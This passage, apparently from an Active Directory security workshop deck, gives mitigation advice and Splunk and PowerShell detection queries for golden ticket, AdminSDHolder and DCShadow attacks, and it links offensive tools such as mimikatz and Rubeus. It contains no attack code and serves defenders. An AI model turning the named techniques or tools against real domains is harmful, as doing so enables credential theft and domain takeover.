 The best defense against golden tickets is limiting access to your domain controller and reducing the footprint of
admin users across your domain. The key to golden ticket attacks is the KRBTGT account’s password hash. This hash
can only be exfiltrated with domain admin/domain controller rights. Focus on preventing attackers from ever
acquiring this password hash.
 Domain admins should only ever logon to domain controllers, nowhere else.
 Domain admin accounts (and other accounts that can access your DC) should also be kept at an absolute minimum
Create dedicated admin groups for other management and troubleshooting tasks across your domain; don’t use your
domain admin accounts for these activities.

DETECTION:
 If you suspect the worst, hunt for suspicious logon events (Event ID 4624 and 4672) from administrator accounts.
index=* EventCode=4672 Account_Name!="*$"
| table _time, ComputerName, Account_Name, Account_Domain

DETECTION:
 Some monitoring and defensive products like Microsoft ATP are capable of detecting golden ticket attacks.
Image from:
https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/Azure-ATP-brings-you-a-new-Preview-detection-
Kerberos-golden/m-p/213146

MITIGATION & DETECTION – ADMINSDHOLDER
MITIGATION:
 Just like with golden tickets, preventing attackers from getting to your administrative users is the key to preventing
AdminSDHolder abuse. Only domain admins can modify the AdminSDHolder container, your priority should be
protecting these high value targets from being accessed by attackers.
 So like I’ve said before:
 Limit the number of domain administrators in your environment.
 Limit where the few domain administrators you have can login i.e. only to the DC.
 Maintain a least privilege model for admins and users in your environment.
 Don’t give regular users local administrator rights to their PC. This just makes an attacker’s job easier.

DETECTION:
 Detection is pretty straightforward since the AdminSDHolder container is never modified; at least not in any situation
I can think of. Use EventID 5136 (a directory service object was modified) and immediately investigate any
modifications to the AdminSDHolder object.
index=* EventCode=5136 Class=container DN=*AdminSDHolder*
| table _time, Account_Name, DN, Type
| rename DN as "TargetObject"

 Some more useful detection advice from adsecurity.org is monitoring users and groups with “AdminCount = 1” to
identify domain accounts with ACLs set by SDProp.You can use the AD Module command below to do this.
Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))” -Properties MemberOf,Created,Modified,AdminCount
| select ObjectClass, Name

MITIGATION & DETECTION – DCSHADOW
MITIGATION:
 I’ve said this before and I’ll say it again; protect your administrative users. DCShadow requires the compromise of a
domain administrator’s account to execute. Stop attackers from getting this and you can save yourself a lot of trouble.
DETECTION:
 DCShadow persistence can be a little tricky to detect since the changes made to AD objects are done via active
directory replication which aren’t logged the same way that regular/direct AD object changes are.
 One of the best ways to detect DCShadow abuse is monitoring your network logs and looking for AD replication
traffic coming from non-domain controller hosts.
 The detection techniques in the next few pages rely on using event logs to identify potential DCShadow abuse.
Detection reference:
https://attack.stealthbits.com/how-dcshadow-persistence-attack-works
https://github.com/AlsidOfficial/UncoverDCShadow

 Use Event ID 4929 (an Active Directory replica source naming context was removed) to identify domain replication
activity coming from the source address of a non-domain controller host.
index=* EventCode=4929 Source_Address!="FOX-SVR-DC.fox.com"
| table _time, Source_Address, TaskCategory
Domain replication activity from a
host that isn’t FOX.com’s domain
controller

 Monitor Event ID 4742 (a computer account was changed) for specific SPN values added to a non-domain controller
host and then immediately being removed.
index=* EventCode=4742
| table _time, Account_Name, Message
SPN values to look for

REFERENCES
I’ve done my best to call out all the resources I’ve used in each individual section, but here are some resources and
references that I believe deserve another mention:
All icons downloaded from: https://www.flaticon.com/
 https://attack.mitre.org/
 https://adsecurity.org/
 https://www.harmj0y.net/blog/
 https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/
 https://attack.stealthbits.com/
 https://posts.specterops.io/
 https://github.com/infosecn1nja/AD-Attack-Defense
 https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-
Detection-And-Protection.pdf
 https://github.com/gentilkiwi/mimikatz/wiki
 https://github.com/BloodHoundAD/Bloodhound/wiki
 https://github.com/GhostPack/Rubeus

theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf

More Related Content

What's hot (20)

Similar to theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf (20)

Recently uploaded (20)

theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf